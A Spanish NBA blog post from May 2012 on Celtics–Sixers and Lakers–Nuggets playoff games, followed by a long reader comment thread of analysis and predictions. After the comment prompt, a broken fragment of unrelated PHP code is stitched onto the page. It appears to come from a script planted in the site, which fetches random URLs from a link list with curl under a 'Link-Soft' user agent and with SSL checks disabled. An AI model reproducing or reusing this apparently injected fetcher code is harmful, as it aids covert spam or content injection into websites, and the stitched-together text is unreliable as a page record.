La Crónica: Nadie dijo que fuera fácil

13 de May de 2012 por Viva_Dirk

Anoche vivimos dos claros ejemplos de lo que son los play-offs. Dos equipos como Lakers y Celtics tuvieron que exprimirse hasta la extenuación para sacar adelante sus partidos, los angelinos para plantarse en 2ª ronda y los verdes para no perder el factor cancha a las primeras de cambio.Pau&Bynum

En Boston, los Sixers arrancaron la moto mucho antes que los Celtics. Al fin y al cabo su motor es más potente y tiene mayor velocidad punta. De la mano de un acertadísimo Iguodala y un gran Turner llegaron a ganar por 10 al final del primer cuarto. A partir de ahí, liderados por Garnett y Rondo, los Celtics bajaron las revoluciones del partido y lograron imponer su ritmo. La segunda unidad de Phily esta vez no marcó diferencias pese a la sorprendente actuación de Lavoy Allen. Podemos hablar de muchas cosas pero fue un partido extremadamente igualado resuelto por pequeñísimos detalles, incluyendo un error estratégico de los Sixers en los tiros libres finales y un bloqueo rozando lo ilegal de Garnett para liberar a Rondo, agotar el reloj y asegurar el triunfo (91-92). Aunque ayer realmente los Sixers perdieron el choque desde la línea de tiros libres, con un 70% global frente al 18 de 19 de los Celtics.

Pau Gasol se redimió de su lamentable partido en el 6º con una actuación colosal en el 7º que impulsó a los Lakers a la segunda ronda (87-96). El ala-pivot español se mostró agresivo y confiado, buscando el aro como tantas veces se le reclama. Junto a él, Andrew Bynum fue una vez más una barrera casi infranqueable y esta vez Kobe Bryant ejerció de director mas que de ejecutor, algo de lo que se encargó nada menos que Steve Blake, con 19 puntos desde el banco. Por los Nuggets, solo Lawson y Afflalo dieron la cara en los titulares, con muy buenas aportaciones de Harrington y Miller. Los Lakers controlaron mucho mejor el balón que su rival y en esta ocasión no les hizo falta ganar la batalla por el rebote, seguramente porque disfrutaron de un poco habitual 46% en triples.

PREMIOS

MVP: Kevin Garnett fue el mejor de los Celtics con 29 puntos, 11 rebotes, 3 tapones, 12 de 20 en tiros y 5 de 5 en libres, como cuando tenia 10 años menos. Premio para el juego interior de los Lakers, la pareja Bynum & Gasol estuvo colosal con 39 puntos, 35 rebotes, 7 asistencias y 10 tapones.

Rookie: Esta vez Faried solo disputó 19 minutos. 6 puntos, 10 rebotes y 4 pérdidas le dio tiempo a registrar.

Sorpresa: Partidazo de Steve Blake, 19 puntos con una gran serie de triples(5 de 6) resultaron fundamentales para ver a los Lakers en 2ª ronda.

Decepción: Danilo Gallinari se despide de la temporada con 3 puntos, 3 rebotes, 3 asistencias, 4 pérdidas y un 1 de 9 en tiros durante los 25 minutos que disputó. Tampoco hizo demasiado Thaddeus Young por la victoria de su equipo, 5 puntos fue todo lo que aportó.

MEV: Andre Iguodala y Evan Turner dieron su mejor cara en Boston, 19-6-6 para el primero y 16-10-3 con 4 robos para el segundo. Ty Lawson vendió cara la piel de su equipo y dejó 24 puntos, 5 rebotes y 6 asistencias en el Staples.

Comenta

47 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Venga va, lo digo. Esteban y Deer, dónde os habéis metido? Espero leer al menos la mitad de comentarios positivos de los comentarios leñeros que disteis el otro día sobre Pau. Porque si se le da leña para lo malo, supongo que también para lo bueno no? Yo cuando critico a Bryant, si al día siguiente lo hace bien reconozco sus méritos, y de hecho pienso que es el mejor jugador del mundo, eso siempre lo he pensado, y por eso supongo que le exijo tanto. Pues lo mismo con Pau. Reconocerlo es de valientes

    Os mandé ayer el análisis Heat-Pacers, se lo mandé a Txus. Algún admin conectado para mandároslo de nuevo?

      Citar

  2. Nacho dice:
    #2

    Por partes, anoche vi la 2ª parte de los Celtics, y todo el partido de LA.
    En el Garden, se vio lo que yo he visto mucho esta temporada con los verdes. Juegan muy al trantán, dependen mucho de la velocidad de Rondo (aunque ayer como los últimos días Garnett esté que se sale, y Pierce haga sus partidazos particulares) De la velocidad y todo lo que implica. El ritmo del partido y sus asistencias. Son equipo ‘viejo’, pero ya sabemos que el diablo sabe más por…
    El problema suyo (de los verdes) es que mantener un ritmo alto les cuesta, no tienen piernas, y se tienen que dosificar. No van a culminar un partido en el tercer cuarto porque realmente no pueden. Y saben que en finales igualados van a ganar un gran porcentaje de partidos. Y claro que les gustaría ganar sin ese desgaste, pero sencillamente no pueden, no tienen banca para eso. Algo así pasó ayer, cuando me enganché acababan de remontar 10 puntos, se les escaparon un poco y los volvieron a pillar, y aunque el marcador ponga un uno arriba, nunca llegaron a temer por su triunfo. Es más, Rondo regaló algo a Sancho, algo que viene reclamando toda la temporada. Pierden una bola a falta de 10 segundos ganando de 3, y en la transición Rondo (cuánto aprende de Doc) hace una falta. Los Sixers meten los dos tiros libres y a 4 segundos para el final, un slalom impresionante de Rondo evita que le hagan falta.
    Los Sixers han llegado enchufados a PO, nada que ver el equipo del último mes y medio. Hay que darles el crédito que merecen.

      Citar

  3. Sancho88 dice:
    #3

    Por cierto, otro pronóstico que acierto en los análisis… dije 4-3 para Lakers, jeje. Estaba cantao… ahora contra OKC habrá séptimo, yo digo 4-3 para OKC por el factor cancha, pero creo que Lakers pueden dinamitar si juegan como ayer. Pau en la zona copooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooon!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Y si tiene que coger 17 rebotes ofensivos consecutivos, pues los cogerá, no pasa nada, jajaja

      Citar

  4. Sancho88 dice:
    #4

    Pues eso, debates Deron-Rondo… esa es la diferencia, el manido IQ… coño, es que hay que pensar un poco no? de vez en cuando no viene mal hacerlo. Es de lógica y que muera el romanticismo mal entendido. Romanticismo es ser un equipo de viejos y conseguir lo que están consiguiendo, romanticismo es Kevin Garnett jugando como si tuviera 25 años. Romanticismo no es dejarse empatar a lo tonto como si esto fuera la liga filipina… Esa es la diferencia. 1-0 y a por el segundo. Vamos, es que dejarse meter un clutch en esas condiciones es de imbéciles. Menos mal que ya va habiendo gente que se olvida de las gilipoyeces de las highlights y esas tonterías y hace lo que tiene que hacer. Qué pasa, que nadie va a ver un partido de los Celtics o de quien sea porque al final van a hacer falta? Ole Rondo, me has ganado definitivamente al hacer eso. Lo que digo, un tipo que piensa… Octavo triple doble de la temporada. Es completamente salvaje, 17 asistencias!! ojú!! Este señor es un jugador de leyenda. Deron? No me hagáis reir…

      Citar

  5. MagicJohnson32 dice:
    #5

    Las autoridades sanitarias advierten que los séptimos partidos son perjudiciales para la salud.

    Bueeeno, magnífico partido de la pareja interior. Pau hizo un partido de manual. Bynum también tiene mucho mérito porque no le estaban saliendo las cosas en ataque y no se frustró, como le pasa tantas veces, sino que siguió luchando cada rebote, siguió agresivo en defensa y finalmente fue decisivo.

    Es curioso, pero creo que la presencia de MWP favorece especialmente a Pau, porque tiene la habilidad de interrumpir las transiciones rápidas del rival, dificultar el movimiento del balón, y permite a Gasol y a Bynum llegar a tiempo en defensa, algo que se había convertido en un gran problema para los Lakers. Eso, y que además secó a Miller y a Gallinari mientras los defendió, por supuesto. Hubo algunos ajustes de Mike Brown en defensa que estuvieron muy bien, como cuando colocó a Kobe sobre Lawson. En fin, que igual que hay que reconocer a los jugadores cuando lo hacen bien, digo yo que también habrá que reconocérselo al entrenador ¿no?

      Citar

  6. MagicJohnson32 dice:
    #6

    ¿Una falta agarrando de la camiseta desde detrás y sin opciones de bola? Eso aquí es antideportiva, jeje.

      Citar

  7. Nacho dice:
    #7

    Lo del Staples, no sé por dónde cogerlo.
    Empezaron bien los amarillos, sin chorradas de 4 abierto, y balones a la zona. Gasol al primer minuto ya mostró de qué iba, anotación tras rebote ofensivo. La defensa bien hasta que Ty Lawson encontró el hueco. Faried y McGee controlados, aunque rebotearon, más que nada porque los angelinos salía a por todos los tiros, sabiendo que liberaban el rebote, pero que provocaban más fallos.
    Kobe errático, pero aún nos regaló un triple que amansó a los de Colorado a falta de un minuto.
    MWP impecable en defensa, y ¡en ataque! (algún fallo de más, pero asumible)
    Blake viviendo una segunda juventud (si es que tuvo primera)
    Pero lo del dominio de sus pivots es engañoso. Dominaron el rebote ofensivo, y estuvieron bien en defensa. Pero apenas hubo jugadas para ellos. Un poco en la primera parte, pero en la segunda prácticamente nada. Denver cerró más su defensa, y el acierto de Blake y MWP impidió el desastre.
    Los rebotes ofensivos de Pau (el final dan 6 en una jugada, yo juraría que fueron menos, pero da igual) fueron claves. Gasol se fue al descanso con 13-7-5, los diez puntos de la segunda parte, 6 fueron tras rebote ofensivo, y cuatro en tiros libres. De ellos solo dos de jugada de ataque. Y falló un tiro en jugada. Es decir, le llegó el balón para jugar en dos ocasiones, más una asistencia, varios balones dentro-fuera que acabaron mal, y alguna asistencia fallida, pero no tuvo control del juego. Fue a su bola. Como Bynum. Ese debe ser el reproche que se tienen que hacer los amarillos. Además esta serie ha demostrado que quien más surte a Bynum es el propio Pau.
    Kobe asumió que no estaba bien, pero jugó demasiado con los exteriores, ya he dicho antes que el acierto les salvó, pero no todos los días es navidad. Ahora eso sí, su triplazo a falta de un minuto para responder al de los Nuggets, que amenazaban con acercarse, antológico.
    y Brown, ¡qué decir de él! Acojonado, es poco, sitúo a las dos torres en torno a la pintura. Igual dirá que ahora lo puede hacer porque tiene a MWP, pero no vale. Ha fallado y mucho esta serie. Esperemos que aprenda, que vienen los Thunder.
    Evans jugó 5 segundos (sí, he dicho segundos), y Barnes 5 minutos. Sumémosle que Hill jugó 11 minutos y Sessions no llegó a 20. Es decir, rotación de acojonado, me recuerda a algún entrenador de por aquí.
    Para mí son capaces de ganar a Durant y compañía, pero Brown no me ofrece confianza. Que mire un poco en la costa Este, y se deja de sus teorías baloncestísticas que ya se ha visto, no sirven de nada.

      Citar

  8. Sancho88 dice:
    #8

    Barnes no está demostrando lo que se le suponía en defensa, y en cambio Artest si hay algo que siempre da es todo en defensa. Siempre genial en el juego sucio. Magic, te paso a ti el análisis de los Heat para que lo cuelgues? Es que me parece a mí que están todos estos sobaos… Dime mail, plis

      Citar

  9. nba dice:
    #9

    Las preguntas para Okc-LAkers debería ser, sera tan cabezon Brown para negar lo evidente, y aportaran algo en esa serie los suplentes de Lakers, porque yo creo que , de esas dos cuestiones dependeran el devenir de esta.
    A ver los ositos que hacen esta tarde,

      Citar

  10. MagicJohnson32 dice:
    #10

    Sancho88:
    Magic, te paso a ti el análisis de los Heat para que lo cuelgues? Es que me parece a mí que están todos estos sobaos… Dime mail, plis

    Pásalo a la dirección de Txus 😉

      Citar

  11. Sancho88 dice:
    #11

    Ya se lo pasé, pero aún no lo ha colgado, por eso lo decía…

      Citar

  12. MagicJohnson32 dice:
    #12

    Vuelve a pasarlo a esa misma dirección y ya me encargo yo. Por cierto, gracias por el curro.

      Citar

  13. Sancho88 dice:
    #13

    Ahí lo dejé, espero que lo encuentres fácil. Y de nada hombre, para mí siempre es un placer que me dejéis tirarme mis pirulas mentales por aquí, jeje. No sabéis lo que he aprendido de NBA desde que os conozco. Gracias a vosotros, en todo caso

      Citar

  14. Viva_Dirk dice:
    #14

    El análisis se postea esta tarde, tranquilidad en las masas.

      Citar

  15. txusma dice:
    #15

    Calma, calma… 😉

      Citar

  16. Sancho88 dice:
    #16

    Menos calma y más loas a Pau.

      Citar

  17. Sancho88 dice:
    #17

    Coño, estoy mirando y he acertado 4 de los 8 pronósticos de cuartos de final.

    El Lakers 4 – 3 Nuggets; Celtics 4 – 2 Hawks; Heat 4 – 1 Knicks; y el OKC 4 – 0 Mavericks.

    Fallé el 2-4 de los Sixers, obviamente, el de San Antonio porque pensé que una victoria sí se iban a llevar los Jazz, el de los Pacers porque veía un 4-2 en vez del 4-1 final, y eso sí, esta la fallé bien fallada, sin excusas, al pronosticar un 4-1 de los Grizzlies sobre los Clippers… qué lejos de la realidad.

    Pero bueno, 4/8 está bastante bien no?

    En las semis ya he dicho tres: 4-3 Celtics contra Sixers; 4-2 Heat contra Pacers; 4-2 OKC contra Lakers, y el último de los Spurs lo digo esta noche cuando se confirme que pasan los Grizzlies, pero veo un apretadísimo 4-3 también aquí. Va a ser la eliminatoria más igualada de todas.

      Citar

  18. HisRoyalAirness dice:
    #18

    Bueno, tremendo partido de los interiores de LA. Tremendo. Era tan difícil? Conclusión: para ganar, ni puto caso a Mike Brown. Le preguntan a Pau al terminar el partido cuál ha sido la diferencia con respecto al anterior y dice “I have to get my ass in the paint”. A ver si lo escucha el mister que, por cierto, le dio por echarle dos broncas públicas por triples de Harrington, manda huevos.
    Así pueden ganarle a los Thunder, lo sigo diciendo. De otra forma no. Metta WORLD WAR tiene unos fundamentos defensivos espectaculares y va a hacer sufrir a Durant y reitero que Ibaka y Perkins no pueden soñar con parar a Bynum-Gasol en una serie.

      Citar

  19. Melo15 dice:
    #19

    Pau y Bynum se van a comer a todos los interiores de los Thunder y si Artest defiende bien a Durant (que lo hara) los Lakers tienen mucho ganado. 4-2 para Lakers.

      Citar

  20. tebias dice:
    #20

    Leo comentarios sobre la defensa de MTP sobre Durant y de que forma se van a comer los interiores de los Lakers a los de los Yhunder…pero creo que olvidais el factor “Harden”, clave en esta serie..pienso que mientras los Lakers siguen haciendo ajustes de como jugar (como todo el año), los Thunder ya pisaron el acelerador.

      Citar

  21. melo15 dice:
    #21

    Factor Harden??, en mi opinion no va a ser tan decisivo en primer lugar va a tener que dosificar sus esfuerzos y centrarse en mas en defender a Kobe que en anotar y en segundo lugar creo que carece de experiencia y va a fallar en los momentos clave.
    PD: Si tienes un juego interior mucho mas dominante que el del contrario, a mi juicio tienes un 35% de la serie ganado y a eso hay que sumarle que Kobe no es precisamente un mediocre.

      Citar

  22. nba dice:
    #22

    Melo, mirate la serie contra Denver, todos sabemos cual debe ser la manera de ganar a thunder, pero Brown que es el que se encarga de poner las piezas ,parece que no

      Citar

  23. melo15 dice:
    #23

    Bueno nba, a mi me parece bien que nutran de balones el juego interior, que no marginen a Pau y que le den mas protagonismo, pero de ahi a no darle un balon a Kobe que es el mejor ju gador de tu equipo.

      Citar

  24. German dice:
    #24

    Rondo 13-12-17 incluyendo las jugadas finales con la falta y el slalom para ganar el partido y no hay mencion alguna en el MVP del dia??

    Coincido con Sancho, Deron no tiene ni para empezar a hablar al lado de este chico.

    No hay que dar por muerto a Oklahoma antes de empezar! Lakers viene de sufrir muchisimo ante Denver como para darlos como amplios favoritos. Por supuesto que si sus interiores se involucran en juego como ayer sus chances crecen considerablemente pero los internos del Thunder no son mancos defendiendo. No digo que los puedan anular, pero tampoco les haran un agujero. Asi como Oklahoma debera preocuparse por Kobe, los angelinos tendran que hacer lo suyo con Durant y la vuelta de El Idiota es una gran ayuda para ellos.
    Westbrook por favor, centrate. Su equipo lo va a necesitar mucho.

      Citar

  25. nba dice:
    #25

    Yo creo que Lakers, tienen como mucho un 20% de posibilidades de ganar a OKC

      Citar

  26. simon dice:
    #26

    Jo Jo Jo vaya partidito el Memphis- LAC. en principio es malo pero esta habiendo emocion y esta entretenido, malos numeros para todo el mundo. y Griffin desaparecido, absolutamente cagado.

      Citar

  27. rumbero dice:
    #27

    Y Randolph y Paul que acabaran cogiditos de la mano de lo bien que se estan llevando.
    Muy bien Gay, no siempre vamos a darle palos. Esta siendo el que aguanta a Memphis en ataque

      Citar

  28. simon dice:
    #28

    Fin del tercer cuarto 55-56 para Memphis tras un buen ataque de Rudy Gay. Casi mete la bomba desde su campo Mo cuando quedaba 1 segundo. El partido aun con anotacion baja lo cierto es que esta siendo un partidazo, muy entretenido y emocionante. Por parte de Clippers, solo Chris Paul y un poco de ayuda de Martin y Mo por parte de Grizzlies partidazo de Gay. Las defensas estan siendo buenisimas por parte de ambos equipos.
    tremendo duelo entre Evans y Haddadi, cuantos palos de aqui para alla! TREMENDO!! jajajaja
    me lo estoy pasando como un enano

      Citar

  29. simon dice:
    #29

    yo este partido ya lo he visto…
    10-2 de parcial para Clippers en el inicio del 4…
    8 arriba LAC

      Citar

  30. MagicJohnson32 dice:
    #30

    El partido de Conley es criminal, un despropósito absoluto. Les está costando la eliminatoria a los Grizzlies, me temo.

      Citar

  31. simon dice:
    #31

    clippers marchandose en el 4 cuarto de la mano de Bledsoe… es que ni siquiera está en cancha CHris Paul…
    Partido horrendo tambien para OJ Mayo que ha tenido varios tiros faciles y lo ha errado practicamente todo…

      Citar

  32. simon dice:
    #32

    es que yo no dejo de fliparlo.
    el equipo que esta machacando a los Memphis en este 4 cuarto es: Bledsoe, Mo, Young, Martin ( partidazo ) y Evans… increible.
    Mayo y Conley les van a costar el partido a Memphis.

      Citar

  33. simon dice:
    #33

    Marc esta manteniendo a flote ahora a Memphis.
    Clippers no permite ni una canasta fácil

      Citar

  34. simon dice:
    #34

    sacan una estadistica apabullante, en el ultimo cuarto TODOS los puntos de Clippers llegan desde el banquillo…

      Citar

  35. simon dice:
    #35

    madremia no recuerdo ni un solo triple en todo el partido de Memphis…

      Citar

  36. Nacho dice:
    #36

    Es un partido de trincheras, y allí loa Clippers y Martin y Evans sobre todo, son superiores.
    No han sabido jugarlo los Grizzlies, desde el primer minuto se veía venir.

      Citar

  37. rumbero dice:
    #37

    Los Clippers han llevado el partido donde querian y les ha salido bien. Tremendo que un tio como Evans haya sido fundamental hoy. Y los Grizzlies mal. Muy mal. Con la serie de tiros de Conley, Randolph y Mayo es imposible llevarse el partido. Marc lo ha intentado sobretodo al final, pero ha sido insuficiente.
    A ver si los Spurs pillen por banda a los angelinos porque en esta serie han empezado a caerme muy mal.

      Citar

  38. Esteban dice:
    #38

    grande clippers!! contra todos los pronosticos!!! una banca capaz de asustar al propio san antonio, si tuviera un 5 inicial decente (foye y jordan son dos agujeros, y butler por ahi anda) podria hasta salir campeon, como se te estraña BIG SHOT

      Citar

  39. Esteban dice:
    #39

    Sancho88:
    Venga va, lo digo. Esteban y Deer, dónde os habéis metido? Espero leer al menos la mitad de comentarios positivos de los comentarios leñeros que disteis el otro día sobre Pau. Porque si se le da leña para lo malo, supongo que también para lo bueno no? Yo cuando critico a Bryant, si al día siguiente lo hace bien reconozco sus méritos, y de hecho pienso que es el mejor jugador del mundo, eso siempre lo he pensado, y por eso supongo que le exijo tanto. Pues lo mismo con Pau. Reconocerlo es de valientes

    Os mandé ayer el análisis Heat-Pacers, se lo mandé a Txus. Algún admin conectado para mandároslo de nuevo?

    Donde estaba mertido? fue sabado por la noche estaba en el boliche con mis amigos, asi que no mire el juego

    buen partido de gasol al parecer, aunque nisiquiera se llevo el MVP de esta pagina, y se hace referencia a el y bynum juntos, y tampoco es que se fue hasta los 30 puntos,

    igualmente festejo que gasol aun tenga partidos decentes

      Citar

  40. melo15 dice:
    #40

    Ya lo dije yo que Clippers ganaba a Memphis y por aqui alguno diciais que ib a ser 4-1 o 4-2 para Memphis JUAS

      Citar

  41. Sancho88 dice:
    #41

    Pues sí, los que dudamos de Paul como factor determinante, entre los que me incluyo, debemos reconocer la eviencia. Lo de Memphis, como diría Mou en su momento, es muy fácil de digerir. En realidad no tienen que hacer gran cosa. Qualifying offer al señor Mayo, creo que sería un gran error venderlo, y desde luego, contrato multianual al señor Conley a buscarle una salida desde ya. Es una gran responsabilidad para un tipo que solo sabe anotar y robar llevar las riendas del equipo. A ver, es muy bueno tirando a canasta y en defensa, pero también pierde balones ridículos porque tiene poquísima visión de juego, da pases al olimpo rodeado de tanta clase y tanto jugón… yo no me lo explico, cualquier Calderón de la vida en su lugar daría más de diez asistencias por partido seguro. Conley fuera ya, es la solución…

      Citar

  42. Melo15 dice:
    #42

    El problema es que si yo fuera Mayo me iria de Memphis cagando leches, todos sabemos que su juego se ha estancado el tio no va a mas y tiene calidad para ser un all-star, no sabemos los motivos, quizas falta de ganas o porque su entrenador lo ha infrautilizado pero desde su temporada Sophmore que ha ido a peor.
    A Conley dudo que lo suelten tengo la sensacion que lo valoran mucho en Tenesee.

      Citar

  43. Esteban dice:
    #43

    mayo no va a renovar en menphis de ninguna manera, con todos los equipos con millones en espacio salarial estaran interesados en el y en hacerle una gran oferta, boston, wizards, nets y pacers se me ocurren ahora mismo

    menphis si le renueva entra al impuesto de lujo con todo el contrato de meyo, creo q podrian soportar 3 o 4 millones de multas, pero mayo recibira ofertas de almenos 7 millones o mas, de eso estoy seguro

      Citar

  44. Sancho88 dice:
    #44

    Hombre, yo digo que debería renovar si consigues empaquetar a Conley en algún traspaso buscando un base que valga poco+ronda de draft o algún expiring…

      Citar

  45. Esteban dice:
    #45

    creo q conley es traspasable, su contrato no es tan malo, y su rendimiento es aceptable

    un cambio que si podria venirle bien a menphis, si es que zach vuelve a ser el del año pasado, seria granger por gay, si bien gay es bastante mejor, granger tiene un contrato barbaro, cobra casi 7 millones menos que gay y ese dinero podria ir destinado a la renovacion de mayo, y creo que granger puede cumplir un papel secundario en menphis

    eso si, zach deberia volver a ser la primer espada como lo fue en los PO pasados

      Citar

  46. Lucho dice:
    #46

    Con respecto a lo que comentaban mas arriba, de mas esta decir q no hay debate, para mi, entre Deron y Rondo. El unico que supera a Rajon es Paul

      Citar

  47. GreenPride dice:
    #47

    Bueno en Boston vivimos lo que siempre pensamos vivir en esta eliminatoria ante los Sixers. Es decir, los Celtics sufren ante las piernas jóvenes y enérgicas de los Sixers pero…. al final sacan su veteranía, su saber hacer, Rondo controla el ritmo, Garnett hace polvo a los Sixers por dentro y victoria para el zurrón. Creo que será la tónica de las series en los partidos de Boston y en alguno de Philadelphia. Increíble el nivel al que está jugando Garnett, rejuvenecido como en sus mejores tiempos.
    En LA, los Lakers jugaron con fuego y al final escaparon indemnes gracias (y aquí voy a desmarcarme un poco) al acierto de Artest y Blake en los lanzamientos exteriores. Y lo explico… creo que es cierto que fue clave dar balones al poste a Pau (por fin) y Bynum pero sobre todo el la primera parte e inicio de la segunda. Luego Denver ajustó cerrando mucho la defensa y con la velocidad sobre todo de Lawson remontaron el partido y estaban metidos en la pomada. Ahí los tiros abiertos de Blake y Artest fueron fundamentales para meter esos puntos que hacían falta. Partido tremendo, muy físico y un 10 para Karl y sus Nuggets que han tenido contra las cuerdas a los Lakers. Estos deberían haber aprendido la lección y sin duda lo mejor que se llevan de la eliminatoria es recuperar a Artest que lo necesitarán muchísimo para intentar el asalto ante OKC.
    Respecto a esa serie si los Lakers cargan juego en el interior la veo muy igualada. Los Thunder tienen un juego interior de grandes jugadores defensivos pero Pau-Bynum podrían dominar la serie si les dan suficientes balones. En cuanto a los Thunder, coincido en que la clave es Harden. Artest hará buen trabajo bajando los porcentajes de Durant pero Kobe sólo puede defender a Westbrook o a Harden y Sessions ha demostrado contra Lawson que no es lo que se dice un perro de presa (Blake no tiene físico para enfrentarse a ninguno de los 2). Kobe va a tener que gastarse mucho en defensa y creo que sus porcentajes de ataque lo notarán. Yo veo la cosa muy igualada y un sétimo en OKC que creo que se llevarán los Thunder

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>